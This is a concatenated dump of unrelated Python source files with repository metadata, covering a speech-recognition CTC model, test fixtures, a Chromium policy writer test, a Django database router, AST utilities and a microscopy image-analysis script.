    if depth == m:
        print(*ans)
        return
    for i in range(n):
        # Only pick numbers >= the previous pick, keeping output non-decreasing.
        if l[i] >= index:
            ans.append(l[i])
            bt(depth + 1, l[i])
            ans.pop()
bt(0, 0)
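# Hedged worked example (not part of the submission): for input "3 2" the
# backtracking prints every non-decreasing pair drawn from 1..3:
#   1 1, 1 2, 1 3, 2 2, 2 3, 3 3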
| [
"[email protected]"
] | |
a63e804d240377f401fed52279ef157ad6bf2aa1 | 6bf036d64271bb062451626c334b6eabaf2bcef9 | /tensorflow_asr/models/ctc/ctc.py | d7dcf5dd5e414338abc25104ccc39efad21dc96b | [
"Apache-2.0"
] | permissive | lamyiowce/TensorFlowASR | 7ce9d96f70da182e7d058a492993b62d523354e5 | 130124ccaf23fabe3e7a6f138d9403a7c0946ef3 | refs/heads/main | 2023-06-25T03:09:28.182924 | 2021-06-10T13:42:45 | 2021-06-10T13:42:45 | 390,671,234 | 0 | 0 | Apache-2.0 | 2021-07-29T09:29:18 | 2021-07-29T09:29:18 | null | UTF-8 | Python | false | false | 7,347 | py | # Copyright 2020 Huy Le Nguyen (@usimarit)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict, Union
import numpy as np
import tensorflow as tf
from ..base_model import BaseModel
from ...featurizers.speech_featurizers import TFSpeechFeaturizer
from ...featurizers.text_featurizers import TextFeaturizer
from ...utils import math_util, shape_util, data_util
from ...losses.ctc_loss import CtcLoss
class CtcModel(BaseModel):
def __init__(self,
encoder: tf.keras.Model,
decoder: Union[tf.keras.Model, tf.keras.layers.Layer] = None,
vocabulary_size: int = None,
**kwargs):
super().__init__(**kwargs)
self.encoder = encoder
if decoder is None:
assert vocabulary_size is not None, "vocabulary_size must be set"
self.decoder = tf.keras.layers.Dense(units=vocabulary_size, name=f"{self.name}_logits")
else:
self.decoder = decoder
self.time_reduction_factor = 1
def make(self, input_shape, batch_size=None):
inputs = tf.keras.Input(input_shape, batch_size=batch_size, dtype=tf.float32)
inputs_length = tf.keras.Input(shape=[], batch_size=batch_size, dtype=tf.int32)
self(
data_util.create_inputs(
inputs=inputs,
inputs_length=inputs_length
),
training=False
)
def compile(self,
optimizer,
global_batch_size,
blank=0,
run_eagerly=None,
**kwargs):
loss = CtcLoss(blank=blank, global_batch_size=global_batch_size)
super().compile(loss=loss, optimizer=optimizer, run_eagerly=run_eagerly, **kwargs)
def add_featurizers(self,
speech_featurizer: TFSpeechFeaturizer,
text_featurizer: TextFeaturizer):
self.speech_featurizer = speech_featurizer
self.text_featurizer = text_featurizer
def call(self, inputs, training=False, **kwargs):
logits = self.encoder(inputs["inputs"], training=training, **kwargs)
logits = self.decoder(logits, training=training, **kwargs)
return data_util.create_logits(
logits=logits,
logits_length=math_util.get_reduced_length(inputs["inputs_length"], self.time_reduction_factor)
)
# -------------------------------- GREEDY -------------------------------------
@tf.function
def recognize(self, inputs: Dict[str, tf.Tensor]):
logits = self(inputs, training=False)
probs = tf.nn.softmax(logits["logits"])
def map_fn(prob): return tf.numpy_function(self._perform_greedy, inp=[prob], Tout=tf.string)
return tf.map_fn(map_fn, probs, fn_output_signature=tf.TensorSpec([], dtype=tf.string))
def _perform_greedy(self, probs: np.ndarray):
from ctc_decoders import ctc_greedy_decoder
decoded = ctc_greedy_decoder(probs, vocabulary=self.text_featurizer.non_blank_tokens)
return tf.convert_to_tensor(decoded, dtype=tf.string)
def recognize_tflite(self, signal):
"""
Function to convert to tflite using greedy decoding
Args:
signal: tf.Tensor with shape [None] indicating a single audio signal
Return:
transcript: tf.Tensor of Unicode Code Points with shape [None] and dtype tf.int32
"""
features = self.speech_featurizer.tf_extract(signal)
features = tf.expand_dims(features, axis=0)
input_length = shape_util.shape_list(features)[1]
input_length = math_util.get_reduced_length(input_length, self.time_reduction_factor)
input_length = tf.expand_dims(input_length, axis=0)
logits = self.encoder(features, training=False)
logits = self.decoder(logits, training=False)
probs = tf.nn.softmax(logits)
decoded = tf.keras.backend.ctc_decode(
y_pred=probs, input_length=input_length, greedy=True
)
decoded = tf.cast(decoded[0][0][0], dtype=tf.int32)
transcript = self.text_featurizer.indices2upoints(decoded)
return transcript
# -------------------------------- BEAM SEARCH -------------------------------------
@tf.function
def recognize_beam(self, inputs: Dict[str, tf.Tensor], lm: bool = False):
logits = self(inputs, training=False)
probs = tf.nn.softmax(logits["logits"])
def map_fn(prob): return tf.numpy_function(self._perform_beam_search, inp=[prob, lm], Tout=tf.string)
        return tf.map_fn(map_fn, probs, fn_output_signature=tf.TensorSpec([], dtype=tf.string))  # match the greedy path; dtype= is a deprecated alias
def _perform_beam_search(self, probs: np.ndarray, lm: bool = False):
from ctc_decoders import ctc_beam_search_decoder
decoded = ctc_beam_search_decoder(
probs_seq=probs,
vocabulary=self.text_featurizer.non_blank_tokens,
beam_size=self.text_featurizer.decoder_config.beam_width,
ext_scoring_func=self.text_featurizer.scorer if lm else None
)
decoded = decoded[0][-1]
return tf.convert_to_tensor(decoded, dtype=tf.string)
def recognize_beam_tflite(self, signal):
"""
Function to convert to tflite using beam search decoding
Args:
signal: tf.Tensor with shape [None] indicating a single audio signal
Return:
transcript: tf.Tensor of Unicode Code Points with shape [None] and dtype tf.int32
"""
features = self.speech_featurizer.tf_extract(signal)
features = tf.expand_dims(features, axis=0)
input_length = shape_util.shape_list(features)[1]
input_length = math_util.get_reduced_length(input_length, self.time_reduction_factor)
input_length = tf.expand_dims(input_length, axis=0)
logits = self.encoder(features, training=False)
logits = self.decoder(logits, training=False)
probs = tf.nn.softmax(logits)
decoded = tf.keras.backend.ctc_decode(
y_pred=probs, input_length=input_length, greedy=False,
beam_width=self.text_featurizer.decoder_config.beam_width
)
decoded = tf.cast(decoded[0][0][0], dtype=tf.int32)
transcript = self.text_featurizer.indices2upoints(decoded)
return transcript
# -------------------------------- TFLITE -------------------------------------
def make_tflite_function(self, greedy: bool = False):
if greedy:
return tf.function(
self.recognize_tflite,
input_signature=[
tf.TensorSpec([None], dtype=tf.float32)
]
)
return tf.function(
self.recognize_beam_tflite,
input_signature=[
tf.TensorSpec([None], dtype=tf.float32)
]
)
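# Hedged usage sketch (assumed wiring, not from this repo's examples): the
# model needs featurizers attached before TFLite export, roughly:
#
#   model = CtcModel(encoder=my_encoder, vocabulary_size=29)
#   model.make(input_shape=[None, 80, 1])
#   model.add_featurizers(speech_featurizer, text_featurizer)
#   fn = model.make_tflite_function(greedy=True).get_concrete_function()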
| [
"[email protected]"
] | |
a277d33f5860071faa32fa667b73c549508cf86b | 6d7e28fd178d5eba1b9e67dd77ad7cec6690743b | /alg_dataset.py | 0a37bab5931b6a82ad462e82449e0347cb2d479e | [] | no_license | Arseni1919/PL_TEMPLATE_PROJECT | ec83f8402996f837cbaccbea092c5cc523a959de | dd5d5fa2284c9ea1da35e316a14299fc89272669 | refs/heads/main | 2023-02-12T18:56:42.810589 | 2021-01-12T09:54:50 | 2021-01-12T09:54:50 | 326,060,903 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | from CONSTANTS import *
class ALGDataset(Dataset):
def __init__(self):
self.buffer = deque(maxlen=REPLAY_SIZE)
def __len__(self):
return len(self.buffer)
def __getitem__(self, indx):
item = self.buffer[indx]
return item.state, item.action, item.reward, item.done, item.new_state
def append(self, experience):
self.buffer.append(experience)
| [
"[email protected]"
] | |
da1c36a4a8b25e9de600154f608421c9cf4a03fb | 60eb288f242b60b872481dc1f38848c19cd51452 | /tests/conftest.py | 6dcddd7abf84dc136e6f1f1f1ff6b0879c50e873 | [
"MIT"
] | permissive | klen/muffin-admin | 62654a515f552b9026a27afc70c3e1b98cbb6f04 | 3c7c2e169911bf5388947447cfc693648decd7cb | refs/heads/develop | 2023-08-30T16:46:28.750256 | 2023-08-24T09:25:16 | 2023-08-24T09:25:16 | 34,291,282 | 19 | 2 | MIT | 2023-02-20T20:25:44 | 2015-04-20T23:04:00 | Python | UTF-8 | Python | false | false | 650 | py | from pathlib import Path
import pytest
from muffin import Application, TestClient
@pytest.fixture(
params=["trio", "curio", pytest.param(("asyncio", {"use_uvloop": False}), id="asyncio")]
)
def aiolib(request):
return request.param
@pytest.fixture(scope="session", autouse=True)
def prebuild_js():
import muffin_admin
main_js = Path(muffin_admin.__file__).parent.parent / "muffin_admin/main.js"
main_js.write_text("console.log('muffin-admin js files');")
yield main_js
main_js.unlink()
@pytest.fixture()
def app():
return Application(debug=True)
@pytest.fixture()
def client(app):
return TestClient(app)
| [
"[email protected]"
] | |
116cac7e4362884c75a97caf04c8c453116a0d80 | fb7efe44f4d9f30d623f880d0eb620f3a81f0fbd | /components/policy/tools/template_writers/writers/android_policy_writer_unittest.py | 6eb7a2f630701bdced109080db050ec1ed51ebb2 | [
"BSD-3-Clause"
] | permissive | wzyy2/chromium-browser | 2644b0daf58f8b3caee8a6c09a2b448b2dfe059c | eb905f00a0f7e141e8d6c89be8fb26192a88c4b7 | refs/heads/master | 2022-11-23T20:25:08.120045 | 2018-01-16T06:41:26 | 2018-01-16T06:41:26 | 117,618,467 | 3 | 2 | BSD-3-Clause | 2022-11-20T22:03:57 | 2018-01-16T02:09:10 | null | UTF-8 | Python | false | false | 2,684 | py | #!/usr/bin/env python
# Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for writers.android_policy_writer'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../..'))
import unittest
from xml.dom import minidom
from writers import writer_unittest_common
from writers import android_policy_writer
class AndroidPolicyWriterUnittest(writer_unittest_common.WriterUnittestCommon):
'''Unit tests to test assumptions in Android Policy Writer'''
def testPolicyWithoutItems(self):
# Test an example policy without items.
policy = {
'name': '_policy_name',
'caption': '_policy_caption',
'desc': 'This is a long policy caption. More than one sentence '
'in a single line because it is very important.\n'
'Second line, also important'
}
writer = android_policy_writer.GetWriter({})
writer.Init()
writer.BeginTemplate()
writer.WritePolicy(policy)
self.assertEquals(
writer._resources.toxml(),
'<resources>'
'<string name="_policy_nameTitle">_policy_caption</string>'
'<string name="_policy_nameDesc">This is a long policy caption. More '
'than one sentence in a single line because it is very '
'important.\nSecond line, also important'
'</string>'
'</resources>')
def testPolicyWithItems(self):
# Test an example policy without items.
policy = {
'name': '_policy_name',
'caption': '_policy_caption',
'desc': '_policy_desc_first.\nadditional line',
'items': [
{
'caption':'_caption1',
'value':'_value1',
},
{
'caption':'_caption2',
'value':'_value2',
}
]
}
writer = android_policy_writer.GetWriter({})
writer.Init()
writer.BeginTemplate()
writer.WritePolicy(policy)
self.assertEquals(
writer._resources.toxml(),
'<resources>'
'<string name="_policy_nameTitle">_policy_caption</string>'
'<string name="_policy_nameDesc">_policy_desc_first.\n'
'additional line</string>'
'<string-array name="_policy_nameEntries">'
'<item>_caption1</item>'
'<item>_caption2</item>'
'</string-array>'
'<string-array name="_policy_nameValues">'
'<item>_value1</item>'
'<item>_value2</item>'
'</string-array>'
'</resources>')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
e4eb19c2ffe6437ac4bd088a7d184763cd6d81a6 | 198f759dc334df0431cbc25ed4243e86b93571eb | /database_routers/mssql_router.py | d5bc32937be3d699277bc992a68a97f54e34657c | [] | no_license | miladhzz/django-muliple-db | ec2074b14dd67a547c982f20b2586f435e7e0d6c | 56ff2555e498d9105cad215daf4c3d4da59d7d9a | refs/heads/master | 2022-12-25T08:08:05.761226 | 2020-10-06T06:38:30 | 2020-10-06T06:38:30 | 301,636,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | class MssqlRouter:
route_app_labels = {'mssql',}
def db_for_read(self, model, **hints):
return 'mssql'
def db_for_write(self, model, **hints):
return 'mssql'
def allow_relation(self, obj1, obj2, **hints):
if (
obj1._meta.app_label in self.route_app_labels or
obj2._meta.app_label in self.route_app_labels
):
return True
return None
def allow_migrate(self, db, app_label, model_name=None, **hints):
"""
All non-auth models end up in this pool.
"""
return True | [
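# Hedged configuration sketch (engine and alias values are assumptions): the
# router only takes effect once settings.py declares it, e.g.
#
#   DATABASES = {
#       "default": {...},
#       "mssql": {"ENGINE": "sql_server.pyodbc", "NAME": "mydb"},
#   }
#   DATABASE_ROUTERS = ["database_routers.mssql_router.MssqlRouter"]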
"[email protected]"
] | |
c27d90b99c370731bf6398c8f1b7c9d70f7b4c7e | d0fec74acfbfdee1b662736731c1cc988e2ba2ee | /problem_40/p040.py | 21c164577ea7c7bd2acc43fe9bacc1d482b5a2b1 | [] | no_license | msztylko/project-Euler | fdd0cfefbe88b63f6dbd2d08f1cd59270b9e1735 | b3f5ce828ccc6662c100dd27fa295fc8afa22f6e | refs/heads/master | 2021-11-23T02:50:19.333259 | 2021-10-31T17:52:28 | 2021-10-31T17:52:28 | 195,980,596 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | import sys
if sys.version_info.major == 2:
range = xrange
def compute():
    # Champernowne's constant: concatenate 1, 2, 3, ... and multiply the
    # digits at 1-indexed positions 1, 10, 100, ..., 10^6.
    s = "".join(str(i) for i in range(1, 1000000))
ans = 1
for i in range(7):
ans *= int(s[10 ** i - 1])
return str(ans)
if __name__ == "__main__":
print(compute())
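# Hedged sanity check (well-known Project Euler 40 result): those seven digits
# are 1, 1, 5, 3, 7, 2, 1, so compute() returns "210".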
| [
"[email protected]"
] | |
dc7eb6e7639c5e65a49e86d7d04a010cc48cc7de | 1d4faec6a04df7dc62f07cbb6716c660f7d0eff8 | /tests/ast_test.py | 1e483df0e4f118ac27942e63980d77826e0ebbf0 | [
"MIT"
] | permissive | QGB/QPSU | a34c8588100c30364c228d8775b3e343f38a8cb4 | 1c4fa4445c8ef3fe8d78fe295839db31dc00d6c9 | refs/heads/master | 2023-09-03T03:05:20.300569 | 2023-08-23T15:34:28 | 2023-08-23T15:34:28 | 41,740,326 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,560 | py | foo : int = 42 # <_ast.AnnAssign
dsf={'AST': (), 'Add': (), 'And': (), 'AnnAssign': ('target', 'annotation', 'value', 'simple'), 'Assert': ('test', 'msg'), 'Assign': ('targets', 'value'), 'AsyncFor': ('target', 'iter', 'body', 'orelse'), 'AsyncFunctionDef': ('name', 'args', 'body', 'decorator_list', 'returns'), 'AsyncWith': ('items', 'body'), 'Attribute': ('value', 'attr', 'ctx'), 'AugAssign': ('target', 'op', 'value'), 'AugLoad': (), 'AugStore': (), 'Await': ('value',), 'BinOp': ('left', 'op', 'right'), 'BitAnd': (), 'BitOr': (), 'BitXor': (), 'BoolOp': ('op', 'values'), 'Break': (), 'Bytes': ('s',), 'Call': ('func', 'args', 'keywords'), 'ClassDef': ('name', 'bases', 'keywords', 'body', 'decorator_list'), 'Compare': ('left', 'ops', 'comparators'), 'Constant': ('value',), 'Continue': (), 'Del': (), 'Delete': ('targets',), 'Dict': ('keys', 'values'), 'DictComp': ('key', 'value', 'generators'), 'Div': (), 'Ellipsis': (), 'Eq': (), 'ExceptHandler': ('type', 'name', 'body'), 'Expr': ('value',), 'Expression': ('body',), 'ExtSlice': ('dims',), 'FloorDiv': (), 'For': ('target', 'iter', 'body', 'orelse'), 'FormattedValue': ('value', 'conversion', 'format_spec'), 'FunctionDef': ('name', 'args', 'body', 'decorator_list', 'returns'), 'GeneratorExp': ('elt', 'generators'), 'Global': ('names',), 'Gt': (), 'GtE': (), 'If': ('test', 'body', 'orelse'), 'IfExp': ('test', 'body', 'orelse'), 'Import': ('names',), 'ImportFrom': ('module', 'names', 'level'), 'In': (), 'Index': ('value',), 'Interactive': ('body',), 'Invert': (), 'Is': (), 'IsNot': (), 'JoinedStr': ('values',), 'LShift': (), 'Lambda': ('args', 'body'), 'List': ('elts', 'ctx'), 'ListComp': ('elt', 'generators'), 'Load': (), 'Lt': (), 'LtE': (), 'MatMult': (), 'Mod': (), 'Module': ('body',), 'Mult': (), 'Name': ('id', 'ctx'), 'NameConstant': ('value',), 'Nonlocal': ('names',), 'Not': (), 'NotEq': (), 'NotIn': (), 'Num': ('n',), 'Or': (), 'Param': (), 'Pass': (), 'Pow': (), 'RShift': (), 'Raise': ('exc', 'cause'), 'Return': ('value',), 'Set': ('elts',), 'SetComp': ('elt', 'generators'), 'Slice': ('lower', 'upper', 'step'), 'Starred': ('value', 'ctx'), 'Store': (), 'Str': ('s',), 'Sub': (), 'Subscript': ('value', 'slice', 'ctx'), 'Suite': ('body',), 'Try': ('body', 'handlers', 'orelse', 'finalbody'), 'Tuple': ('elts', 'ctx'), 'UAdd': (), 'USub': (), 'UnaryOp': ('op', 'operand'), 'While': ('test', 'body', 'orelse'), 'With': ('items', 'body'), 'Yield': ('value',), 'YieldFrom': ('value',)}
import sys;'qgb.U' in sys.modules or sys.path.append('C:/QGB/babun/cygwin/bin/');from qgb import *
from _ast import AST
import ast
import json
def ast2json( node ):
if not isinstance( node, AST ):
raise TypeError( 'expected AST, got %r' % node.__class__.__name__ )
def _format( node ):
if isinstance( node, AST ):
fields = [ ( '_PyType', _format( node.__class__.__name__ ) ) ]
fields += [ ( a, _format( b ) ) for a, b in iter_fields( node ) ]
return '{ %s }' % ', '.join( ( '"%s": %s' % field for field in fields ) )
if isinstance( node, list ):
return '[ %s ]' % ', '.join( [ _format( x ) for x in node ] )
return T.json_dumps(node)
try:
return json.dumps( node )
except Exception as e:
import pdb;pdb.set_trace()
return _format( node )
def iter_fields( node ):
for field in node._fields:
try:
yield field, getattr( node, field )
except AttributeError:
pass | [
"[email protected]"
] | |
68653bc8d29f3dcdda99954fd2c56c4db08be014 | 2020c9c6958d9cc338b72f62e24d9ad30c1a8cad | /python/0048.rotate-image/rotate-image.py | ebc9d290238139686bdea8148f5026ac7910bff1 | [] | no_license | ysmintor/leetcode | b2d87db932b77e72504ffa07d7bf1b0d8c09b661 | 434889037fe3e405a8cbc71cd822eb1bda9aa606 | refs/heads/master | 2020-05-30T21:03:03.886279 | 2019-10-31T08:46:23 | 2019-10-31T09:02:24 | 189,963,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | class Solution:
def rotate(self, matrix: List[List[int]]) -> None:
"""
Do not return anything, modify matrix in-place instead.
"""
        # There are 3 common approaches, each with its own trick; learn all three when time allows.
n = len(matrix)
for i in range(n):
for j in range(i+1, n):
matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]
for row in range(n):
matrix[row].reverse() | [
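        # Hedged alternative sketch (one of the other approaches mentioned
        # above): rotate four cells at a time, ring by ring, fully in place.
        #
        #   for i in range(n // 2):
        #       for j in range(i, n - 1 - i):
        #           tmp = matrix[i][j]
        #           matrix[i][j] = matrix[n-1-j][i]
        #           matrix[n-1-j][i] = matrix[n-1-i][n-1-j]
        #           matrix[n-1-i][n-1-j] = matrix[j][n-1-i]
        #           matrix[j][n-1-i] = tmp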
"[email protected]"
] | |
f8776100c8b24432acc2e97ace4ab1451f7b2dc0 | 06cabd66791a5ee15bb3ba4b04d8bc8dea5bfda0 | /2016-09-17_GranaOnIL-ZnO/Analysis.py | ab1a1fe78cc33ee40590c6130f4f2218d0b61987 | [] | no_license | claiello/python_data_analysis | f7405dfd15f0dccd2089b1878af40b9d075071d2 | 0b8d3cc5717243e72214dc24a7fc823220e13179 | refs/heads/master | 2020-04-17T20:36:51.720891 | 2017-04-23T10:00:08 | 2017-04-23T10:00:08 | 66,181,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,355 | py | import os
import sys
sys.path.append("/usr/bin") # necessary for the tex fonts
sys.path.append("../Python modules/") # necessary for the tex fonts
import scipy as sp
import scipy.misc
import matplotlib.pyplot as plt
import h5py
import numpy as np
from BackgroundCorrection import *
import matplotlib.cm as cm
import scipy.ndimage as ndimage
#from matplotlib_scalebar.scalebar import ScaleBar
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.backends.backend_pdf import PdfPages
from MakePdf import *
from PlottingFcts import *
import warnings
warnings.simplefilter(action = "ignore", category = RuntimeWarning)
warnings.simplefilter(action = "ignore", category = DeprecationWarning)
warnings.simplefilter(action = "ignore", category = FutureWarning)
warnings.simplefilter(action = "ignore", category = PendingDeprecationWarning)
warnings.filterwarnings("ignore", category=np.VisibleDeprecationWarning)
from Registration import reg_images
from sklearn.mixture import GMM
import matplotlib.cm as cm
#import scalebars as sb
No_pixels = 250
name = ['Ib-2016-09-17-1824_ImageSequence_Grana_2.000kX_4.000kV_30mu_37',
'IIb-2016-09-17-1853_ImageSequence_Grana_2.000kX_4.000kV_30mu_44',
'III-2016-09-17-1903_ImageSequence_Grana_2.000kX_4.000kV_30mu_45',
'IVb-2016-09-17-1917_ImageSequence_Grana_2.000kX_4.000kV_30mu_49',
'V-2016-09-17-1952_ImageSequence_Grana_2.000kX_4.000kV_30mu_57',
'VI-2016-09-17-2011_ImageSequence_Grana_1.939kX_4.000kV_30mu_61',
'VII-2016-09-17-2025_ImageSequence_Grana_1.879kX_4.000kV_30mu_66'
]
Pixel_size = [5.6e-08, 5.6e-08, 5.6e-08, 5.6e-08, 5.6e-08, 5.8e-08, 5.9e-08] #as given by accompanying text file
Ps = [56,56,56,56,56,58,59]
lag = [500, 50,50,50,50,50,50]
frames = [20, 50,50,50,100,100,100]
obs = ['Region I', 'Region II','Region III (maybe anti-corr blob?)', 'Region IV', 'Region V (positive correlation)', 'Region VI (grana a bit visible in SE)', 'Region VII (grana a bit visible in SE)']
index = 4
### data
file1 = h5py.File(name[index] + '.hdf5', 'r')
se = file1['/data/Analog channel 1 : SE2/data'] #50 frames x250 x 250 pixels
red = file1['/data/Counter channel 1 : PMT red/PMT red/data']#50 frames x 200 tr pts x250 x 250 pixels
blue = file1['/data/Counter channel 2 : PMT blue/PMT blue/data']#50 frames x 200 tr pts x250 x 250 pixels
se = np.array(se)
red = np.array(red)
blue = np.array(blue)
#convert red1_dset to kHz!!!!!!!!!!!!!!!!!!!!!1
red = red/1.0e3
blue = blue/1.0e3
unit = '(kHz)'
###
se_dset = se
red_dset = red
blue_dset = blue
### register
#independently
#se_dset_reg = reg_images(se_dset)
#blue_dset_reg = reg_images(blue_dset)
#red_dset_reg = reg_images(red_dset)
#when SE fails
#blue_dset_reg, red_dset_reg = reg_images(blue_dset, red_dset)
#se_dset_reg = np.average(se_dset, axis = 0)
#based on registering of se
se_dset_reg ,blue_dset_reg, red_dset_reg = reg_images(se_dset,blue_dset, red_dset)
# Cutting if necessary
#### cut only inside window: these are the base images!!!!!!!!!!!!!!!!!!!!!!!!!!!!
##trying circular mask at center a,b
#a, b = 247,255 #y was 255 x was 243
#n = blue_dset_reg.shape[0] #not square matrix anymore; does not matter, only approximatively
#r = 160 #was 170
#y,x = np.ogrid[-a:n-a, -b:n-b]
#mask = x*x + y*y <= r*r
## cutting 3 channels
#blue_dset_cut = np.empty([blue_dset_reg.shape[0],blue_dset_reg.shape[1]])
#blue_dset_cut[:] = np.nan
#blue_dset_cut[mask] = blue_dset_reg[mask]
#
#red_dset_cut = np.empty([blue_dset_reg.shape[0],blue_dset_reg.shape[1]])
#red_dset_cut[:] = np.nan
#red_dset_cut[mask] = red_dset_reg[mask]
#
#se_dset_cut = np.empty([blue_dset_reg.shape[0],blue_dset_reg.shape[1]])
#se_dset_cut[:] = np.nan
#se_dset_cut[mask] = se_dset_reg[mask]
#not cutting
blue_dset_cut = blue_dset_reg
red_dset_cut = red_dset_reg
se_dset_cut = se_dset_reg
fig4 = plt.figure(figsize=(8, 6), dpi=80)
ax1 = plt.subplot2grid((1,3), (0, 1), colspan=1)
ax1.set_title('Blue channel base')
plt.imshow(blue_dset_cut,cmap='Blues')
ax1 = plt.subplot2grid((1,3), (0, 2), colspan=1)
ax1.set_title('Red channel base')
plt.imshow(red_dset_cut,cmap='Reds')
ax1 = plt.subplot2grid((1,3), (0, 0), colspan=1)
ax1.set_title('SE channel base')
plt.imshow(se_dset_cut,cmap='Greys')
#plt.close("all")
title = 'Grana + IL on ZnO:Ga (4kV, 30 $\mu$m, ' + str(Ps[index]) + 'nm pixels, ' + str(lag[index]) + '$\mu$s lag per pixel, ' + str(frames[index]) + ' expts., SE registered), \n' + obs[index]
scinti_channel = '$<$ 593nm'
sample_channel = '$>$ 647nm'
length_scalebar = 5000.0 #in nm (1000nm == 1mum)
scalebar_legend = '5 $\mu$m'
#plot_3_channels(se_dset_cut,blue_dset_cut, red_dset_cut, Pixel_size[index], title, scinti_channel, sample_channel, length_scalebar, scalebar_legend,unit,work_red_channel=True)
#multipage('ZZ' + name[index] + '.pdf')
#plot_3_channels_stretch(se_dset_cut,blue_dset_cut, red_dset_cut, Pixel_size[index], title, scinti_channel, sample_channel, length_scalebar, scalebar_legend,unit)
#multipage('ZZStretch' + name[index] + '.pdf')
plot_2_channels_divide(se_dset_cut,blue_dset_cut, red_dset_cut, Pixel_size[index], title, scinti_channel, sample_channel, length_scalebar, scalebar_legend,unit,work_red_channel=True)
multipage('ZZDivide' + name[index] + '.pdf')
fig40 = plt.figure(figsize=(8, 6), dpi=80)
plt.imshow(blue_dset_cut/red_dset_cut)
plt.colorbar()
plt.clim([0,200])
plt.show()
sys.exit(0)  # intentional early stop; the exploratory segmentation code below is not run
###################################################################### OPTIONAL
want_gaussian_filter_correction_blue = False
want_gaussian_filter_correction_red = False
if want_gaussian_filter_correction_blue:
sigma_blue = 1
blue_dset_cut1 = gaussian_filter_correction(blue_dset_cut, 'Blue',sigma_blue)
blue_dset_cut = blue_dset_cut1
if want_gaussian_filter_correction_red:
sigma_red = 1
red_dset_cut1 = gaussian_filter_correction(red_dset_cut, 'Red',sigma_red)
red_dset_cut = red_dset_cut1
############################################################### END OF OPTIONAL
###################################################################### OPTIONAL
### Suggested:
# 1- Blue True, 3, [0] + Red False
# 2 - Blue True, 3, [2] + Red False
# 3 - Blue True, 3, [0] + Red True, 21, [1]
# 4 - Blue True, 3, [2] + Red True, 21, [1]
# 5 - Blue False, Red False
want_background_correction_blue = False
want_background_correction_red = False
filterset = ['white_tophat','black_tophat','medfilt']
if want_background_correction_blue:
# Available algo types:
# 'white_tophat' -> needs to change disk size
# 'black_tophat' -> needs to change disk size
# 'medfilt' -> needs to changer kernel size
# New base dsets: blue_dset_cut, red_dset_cut
size_blue = 3
blue_dset_cut1 = background_correction(blue_dset_cut, filterset[0], 'Blue',size_blue)
#blue_dset_cut2 = background_correction(blue_dset_cut, filterset[1], 'Blue',size_blue)
blue_dset_cut3 = background_correction(blue_dset_cut, filterset[2], 'Blue',size_blue)
#both [0] and [2] acceptable; min size_blue that makes sense = 3
blue_dset_cut = blue_dset_cut1 #1 or 3
if want_background_correction_red:
size_red = 21
#red_dset_cut1 = background_correction(red_dset_cut, filterset[0], 'Red',size_red)
red_dset_cut2 = background_correction(red_dset_cut, filterset[1], 'Red',size_red)
#red_dset_cut3 = background_correction(red_dset_cut, filterset[2], 'Red',size_red)
# [1] can be good. Or no correction.
red_dset_cut = red_dset_cut2
############################################################### END OF OPTIONAL
#plt.close("all")
from CreateDatasets import *
do_avg_dset = True
do_median_dset = True
do_arb_thr_one = True
do_gmmred_dset = True
do_gmmboth_dset = True
do_threshold_adaptive = True
do_random_walker = True
do_otsu = True
### construct different datasets
### 1) Simple average
if do_avg_dset:
below_blue, above_blue, below_red, above_red = above_below_avg(blue_dset_cut, red_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, below_blue, above_blue, below_red, above_red, 'YAP', 'Chlor','Above/Below avg', 'below avg', 'above avg',Pixel_size[index])
### 1) Simple median
if do_median_dset:
belowm_blue, abovem_blue, belowm_red, abovem_red = above_below_median(blue_dset_cut, red_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, belowm_blue, abovem_blue, belowm_red, abovem_red, 'YAP', 'Chlor','Above/Below median', 'below median', 'above median',Pixel_size[index])
### 1) Arb thresh in red
if do_arb_thr_one:
arb_threshold = 0.6 #fraction of max
belowarb_blue, abovearb_blue, belowarb_red, abovearb_red = arb_thr_one(red_dset_cut, blue_dset_cut, arb_threshold)
do_analysis(blue_dset_cut, red_dset_cut, belowarb_blue, abovearb_blue, belowarb_red, abovearb_red, 'YAP', 'Chlor','Above/Below arb thr = ' + str(arb_threshold) + ' of red max', 'below red thr', 'above red thr',Pixel_size[index])
### 2) GMM with red mask, where red has been recognized as fluorescence
if do_gmmred_dset:
gmmred_blue_dark_dset, gmmred_blue_bright_dset, gmmred_red_dark_dset, gmmred_red_bright_dset = gmmone(red_dset_cut, blue_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, gmmred_blue_dark_dset, gmmred_blue_bright_dset, gmmred_red_dark_dset, gmmred_red_bright_dset, 'YAP', 'Chlor','GMM red', 'red dark spots', 'red bright spots',Pixel_size[index])
### 3) GMM with independent masks in both channels
if do_gmmboth_dset:
gmmboth_blue_dark_dset, gmmboth_blue_bright_dset, gmmboth_red_dark_dset, gmmboth_red_bright_dset = gmmboth(red_dset_cut, blue_dset_cut)
do_analysis(blue_dset_cut, red_dset_cut, gmmboth_blue_dark_dset, gmmboth_blue_bright_dset, gmmboth_red_dark_dset, gmmboth_red_bright_dset, 'YAP', 'Chlor','GMM both', 'dark spots', 'bright spots',Pixel_size[index])
### 4) Threshold adapative
if do_threshold_adaptive:
blocksize = 11
offset = 0
th_below_blue, th_above_blue, th_below_red, th_above_red = threshold_adaptive_dset(red_dset_cut, blue_dset_cut,blocksize, offset)
